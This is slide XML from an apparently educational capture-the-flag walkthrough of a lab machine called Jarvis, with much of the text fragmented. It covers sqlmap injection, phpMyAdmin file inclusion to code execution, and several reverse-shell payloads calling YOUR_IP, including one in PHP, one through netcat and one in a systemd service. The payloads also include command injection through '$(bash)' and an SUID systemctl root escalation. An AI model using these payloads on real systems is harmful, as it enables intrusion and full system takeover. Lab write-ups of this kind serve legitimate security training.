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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="26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4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037FB-9217-C847-BAEC-767188B47FC9}" v="2316" dt="2020-01-24T00:05:4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8"/>
    <p:restoredTop sz="85497"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="114" d="100"/>
          <a:sy n="114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8A2CF-1390-A04A-A676-C803B10A3FDD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3268F-D626-3B44-A83B-93E6C2900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1/23/20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1/23/20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1/23/20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9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8" r:id="rId6"/>
    <p:sldLayoutId id="2147483673" r:id="rId7"/>
    <p:sldLayoutId id="2147483674" r:id="rId8"/>
    <p:sldLayoutId id="2147483675" r:id="rId9"/>
    <p:sldLayoutId id="2147483677" r:id="rId10"/>
    <p:sldLayoutId id="21474836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dium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8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0.10.10.143/phpmyadmin/index.php?target=sql.php?/../../../../var/lib/php/sessions/sess_PASTE_SESSION_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our_ip:8000/LinEnum.sh" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh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tfobins.github.io/gtfobins/systemctl/#suid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13E5A2F-87CE-4402-B004-17FC8414E0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5866" b="9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84F70-4345-2E43-B28C-DD2BD144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Let’s Hack!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4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456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A35A-7CBB-184A-A2DD-5E083E3BE3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9652"/>
            <a:ext cx="2595715" cy="953677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Scanning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F3A09A41-6883-614B-B000-3DC4C95F85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5457" y="1026079"/>
            <a:ext cx="5967412" cy="411342"/>
          </a:xfrm>
        </p:spPr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jarvis.nmap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10.10.10.143</a:t>
            </a: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Content Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32B96018-A0E1-9747-8A1F-61F21F370179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875457" y="1638797"/>
            <a:ext cx="1238351" cy="41134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dirty="0" err="1"/>
              <a:t>Dirbuster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A5C2D-28D4-C04E-9BA0-1E4A5DF484B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2215705" y="1638797"/>
            <a:ext cx="7022308" cy="4469567"/>
            <a:chOff x="2215705" y="1638797"/>
            <a:chExt cx="7022308" cy="44695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BCE91BF-F963-C84B-B272-D7C4F1E0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5705" y="1638797"/>
              <a:ext cx="7022308" cy="4469567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7CB4D67-5A19-2E47-9EE8-C4D6AB256B72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4250243" y="4593790"/>
              <a:ext cx="1231900" cy="3302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5C0435-352E-5D45-B1C4-51F8B7402B1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215705" y="2041090"/>
              <a:ext cx="1399538" cy="411341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44C146A6-19DB-354C-876E-6E3E1F2DCA1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9363019" y="5475823"/>
            <a:ext cx="2214107" cy="81366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Discovered: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phpmyadmin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70D1B-DE69-6E43-9747-339675D0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A35A-7CBB-184A-A2DD-5E083E3BE3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9825" y="72402"/>
            <a:ext cx="2595715" cy="953677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting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CD3E76-B4BC-4A43-BEDD-2ADC9435BA61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="349825" y="1026079"/>
            <a:ext cx="10830406" cy="953677"/>
            <a:chOff x="349825" y="1026079"/>
            <a:chExt cx="10830406" cy="953677"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Content Placeholder 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{503AA234-BF31-6048-AACC-CDF79EE39803}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="349825" y="1026079"/>
              <a:ext cx="5923721" cy="953677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:normAutofit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="91440" indent="-91440" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1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01168" lvl="1" indent="0">
                <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0"/>
                <a:t>Stark Hotel</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1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 looking around we notice</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1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lvl="1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lvl="1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lvl="1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marL="201168" lvl="1" indent="0">
                <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pP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lvl="1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lvl="1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lvl="1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6E8D1D-C938-4443-953D-E67080A8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026079"/>
              <a:ext cx="5084231" cy="84092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3DA007-697B-9342-BD2C-7DE63CBFBB0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468352" y="1963444"/>
            <a:ext cx="12355550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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4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Let’s try SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" lvl="1" indent="-182880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sqlmap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--password --batch –-delay 2 --random-agent -u "http://10.10.10.143/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room.php?cod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=2"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" lvl="1" indent="-182880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Using --password because we want to access /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phpmyadmin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977F8-B595-8348-928C-6ED6E309F066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468352" y="4747532"/>
            <a:ext cx="1235555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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4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Discovered credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" lvl="1" indent="-182880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Dbadmin:imissyou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3053D8-AAB8-2946-9213-191C30D1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70" y="3187525"/>
            <a:ext cx="8390991" cy="13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A35A-7CBB-184A-A2DD-5E083E3BE3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9825" y="72402"/>
            <a:ext cx="2595715" cy="953677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting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D54EE0-F384-2045-8E45-940E539BAB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="349825" y="1026079"/>
            <a:ext cx="10736105" cy="1126106"/>
            <a:chOff x="349825" y="1026079"/>
            <a:chExt cx="10736105" cy="1126106"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Content Placeholder 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD43F00-65B9-0249-BE02-D278B6C139E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="349825" y="1026079"/>
              <a:ext cx="6858442" cy="1126106"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:normAutofit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="91440" indent="-91440" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1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01168" lvl="1" indent="0">
                <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
                <a:t>phpmyadmin</a:t>
              </a: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marL="201168" lvl="1" indent="0">
                <a:buNone/>
              </a:pP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We notice the version and google it. No sense reinventing the wheel.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="201168" lvl="1" indent="0">
                <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pP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lvl="1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lvl="1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lvl="1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29E5A1-2BA2-864A-AABA-74B5098F7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3930" y="1026079"/>
              <a:ext cx="3302000" cy="9779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519CDE-CA66-C343-A7A2-3DC5A5FA2160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="349825" y="2372899"/>
            <a:ext cx="10736105" cy="1320800"/>
            <a:chOff x="349825" y="2372899"/>
            <a:chExt cx="10736105" cy="1320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FD498A-1AA5-3249-8DA4-086A31490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2330" y="2372899"/>
              <a:ext cx="4673600" cy="1320800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Content Placeholder 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70280A48-8415-5D48-878C-6EA4626115C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="349825" y="2372899"/>
              <a:ext cx="5560321" cy="1126106"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:normAutofit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="91440" indent="-91440" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1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01168" lvl="1" indent="0">
                <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pP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Google proves to be fruitful:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="201168" lvl="1" indent="0">
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e</a:t>
              </a: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045B682-8B3F-6846-9DD9-DA3C55E39586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524107" y="3499005"/>
            <a:ext cx="102591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 of Vulnerability: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 appears that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index.php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includes any file provided in the "target" argument of the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so long as it clears a whitelist. The whitelist contains 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sql.php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". To include a different file and bypass the whitelist, we just use "target=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sql.php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?/path/to/malicious/file".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Combine this with the fact that SQL queries made are stored in the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users's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session, which is stored at /var/lib/php/sessions/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sess_SESSION_ID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we can get remote code execution.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6F8F9-1985-224F-B94C-ABCA3DAE3223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613317" y="5207619"/>
            <a:ext cx="233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SQL Query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'&lt;?php malicious code?&gt;'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CBA59C-33FD-3F44-938B-184278B4A40A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3129985" y="5207618"/>
            <a:ext cx="256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 Query is stored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session in /var/lib/php/session/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sess_SESSIONID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600EA0-F0EA-3F4B-A1EB-91CC6FA579E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882718" y="5207618"/>
            <a:ext cx="256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 Local File Inclusion loads the session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6A7092-C453-C446-8D68-4ED8F3474FF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8749130" y="5207618"/>
            <a:ext cx="256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4. PHP Webserver executes any PHP code found in the file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301630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A35A-7CBB-184A-A2DD-5E083E3BE3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9825" y="72402"/>
            <a:ext cx="2595715" cy="953677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting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CEFC79-A380-A14A-A7F8-AFFF5861D7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="289481" y="1005585"/>
            <a:ext cx="11303198" cy="1736571"/>
            <a:chOff x="289481" y="1005585"/>
            <a:chExt cx="11303198" cy="17365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133A0E-D274-894E-A513-E80EF3E55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236" y="1005585"/>
              <a:ext cx="6675443" cy="17365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BC11CD-8028-1746-B9E2-CEB89EB77BD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="289481" y="1528184"/>
              <a:ext cx="43605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select '&lt;?php $sock=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fsockopen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("YOUR_IP",PORT);$proc=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proc_open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("/bin/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sh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-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", array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock), $pipes);?&gt;'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C62EBF-E0EE-ED48-BB22-0A19B953AAAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="289481" y="1136953"/>
              <a:ext cx="1583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Make Query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6E3032-BA9E-0944-A031-D4FFC0014CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="298367" y="2984396"/>
            <a:ext cx="10613508" cy="1608817"/>
            <a:chOff x="298367" y="2984396"/>
            <a:chExt cx="10613508" cy="16088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95823-B61F-8745-A4FB-D3CFFDA3DA06}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="298367" y="2995605"/>
              <a:ext cx="5872557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Get Session ID</a:t>
              </a:r>
            </a:p>
            <a:p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RightClick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 Inspect Element &gt; Network Tab &gt; Select an item &gt; Cookies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8F82D9-9C8B-0E48-93E2-FAFFEBC6A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068" y="2984396"/>
              <a:ext cx="4343807" cy="1608817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80749BF-290D-334E-8981-779A22D6AB32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298367" y="4593213"/>
            <a:ext cx="10764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Local File inclusion to Shell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 listener: #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nlvp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PORT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Navigate to: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http://10.10.10.143/phpmyadmin/index.php?target=sql.php?/../../../../var/lib/php/sessions/sess_PASTE_SESSION_ID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A35A-7CBB-184A-A2DD-5E083E3BE3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9825" y="72402"/>
            <a:ext cx="8716116" cy="95367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Privilege Escalation: www-data -&gt; Pepper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6D09E-C1B3-144B-8C53-AE19DBDBB4B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349825" y="1026079"/>
            <a:ext cx="4701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LinEnum.sh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the server and run it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7D2F9-4FC5-0246-95CC-BC3A60BF7631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457619" y="1456536"/>
            <a:ext cx="9678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Locally, run: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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/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python –m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SimpleHTTPServer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8000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 the Target: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cd /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http://YOUR_IP:8000/LinEnum.sh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LinEnum.sh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./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LinEnum.sh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tee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enum.txt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D8BFC-292E-7441-9157-B4A84D1ED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58" y="5257599"/>
            <a:ext cx="5778500" cy="733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7F3B28-9354-2C4B-9402-387ADA399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958" y="3836393"/>
            <a:ext cx="5654343" cy="1227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C1BD57-03C1-4F42-AB0D-82452D74F9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457619" y="3789819"/>
            <a:ext cx="3757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 Notice 2 interesting things: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We can run a python script as Pepper without providing a password.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systemctl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has the SUID bit flipped, we'll have to remember this for later. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415328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A35A-7CBB-184A-A2DD-5E083E3BE3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9825" y="72402"/>
            <a:ext cx="8716116" cy="95367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Privilege Escalation: www-data -&gt; Pepper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D6199F-D3F4-2044-8BF0-F8D851094C4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="349825" y="1014928"/>
            <a:ext cx="11013424" cy="1866900"/>
            <a:chOff x="349825" y="1014928"/>
            <a:chExt cx="11013424" cy="1866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86D09E-C1B3-144B-8C53-AE19DBDBB4B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="349825" y="1026079"/>
              <a:ext cx="4701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Let's read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simpler.py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4E826F-EBE7-674A-BF66-D255975EE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0549" y="1014928"/>
              <a:ext cx="5092700" cy="1866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D87E18-1C80-424B-B0D8-DF3470A7F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1700" y="1026079"/>
              <a:ext cx="2654300" cy="6731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A619DF0-6666-984B-96D9-02F52BF3C6F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349824" y="1821577"/>
            <a:ext cx="5746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 After some light reading, we notice that a '–p' will call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exec_ping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function, which will ask for input and put that input into a shell command: ping [user-input]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Although it is filtered, not very well.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0BE9C-CA14-8048-8E6F-65F3C88166A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349824" y="3282097"/>
            <a:ext cx="1013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 After attempting to inject some commands we succeed with "$(bash)", although we don't see any output. How can we verify?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B6DEA-3DB9-AC4E-A732-2C4A0F09407F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349824" y="4003240"/>
            <a:ext cx="5746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4. Run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tcpdump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local machine and ping yourself.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Locally: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tcpdump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tun0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icmp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 Target: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ping –c 2 YOUR_IP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RCE Confirmed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61F9E-6351-2A47-B438-F6E4C2DB4733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943811" y="4003240"/>
            <a:ext cx="5976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5. Get a better shell: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this blind RCE, let's establish another connection.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Locally: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nlvp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4445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 Target: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YOUR_IP 4445 –e /bin/bash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whoami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see we are now Pepper!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33467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A35A-7CBB-184A-A2DD-5E083E3BE3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9825" y="72402"/>
            <a:ext cx="8716116" cy="953677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Escalation: Pepper -&gt; Root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38FC1-AF67-C544-9213-056B7A9DADC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349825" y="1026079"/>
            <a:ext cx="8270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Look up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systemctl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GTFO BINS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins/systemctl/#suid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Summary: We need to create a service and run it. Google "How create service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"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85EE8-71EF-D44E-A86B-557B3BFF727A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349825" y="1750042"/>
            <a:ext cx="82700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 Create a service file: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[Unit]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Description=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Ownage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[Service]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ExecStart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=/bin/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–c “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YOUR_IP PORT -e /bin/bash”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[Install]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WantedBy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=multi-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user.target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20631-3BC1-3D45-BF96-9E67D8A8E11E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349825" y="3507521"/>
            <a:ext cx="827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 Get this file onto the target machine. Preferably in /home/pepper.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 the same simple server +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method that was used for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LinEnum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earlier.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46586E-7823-F74C-83A2-8BB72A53E255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349825" y="4187782"/>
            <a:ext cx="827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4. Start your listener (Locally):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nlvp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4446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ADA3AA-91DA-1041-9FE7-154B4927D825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349825" y="4656446"/>
            <a:ext cx="5582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5. Link and Enable service (On Target):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systemctl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link /home/pepper/SERVICE_FILE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systemctl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enable --now /home/pepper/SERVICE_FILE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D7239-AA10-994C-A502-432E0B681039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4652600"/>
            <a:ext cx="5582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6. Watch your reverse shell connect and type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whoami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 are now root.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36586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257986-FDD3-0A48-B113-703EBCF919D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2495400" y="2395064"/>
            <a:ext cx="6779229" cy="3221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www-data$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> –u pepper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>simpler.py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A1FC7-FECA-EA4F-A8D1-4E52094E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14613-1BB3-104D-9758-CE0DEF810C20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2359439"/>
            <a:ext cx="1016527" cy="329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1E242D1-30DC-8A4C-B314-F5A615398ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774967" y="2787238"/>
            <a:ext cx="1016526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5EACF3-9700-6B44-B42D-21A8803E96BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2917371" y="2766951"/>
            <a:ext cx="6179129" cy="27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ping $(/bin/bash)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1A887D-04B2-B14F-B8FC-662D0D6F74CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3213464" y="3145973"/>
            <a:ext cx="5776157" cy="22097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pepper – blind bash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A8B23-5B4B-5345-BDBA-9C6CEFAF8E0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618014" y="3555283"/>
            <a:ext cx="5193478" cy="162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pepper$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reverse shell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17AB78-BA75-154F-A9B9-4A7D5141258E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
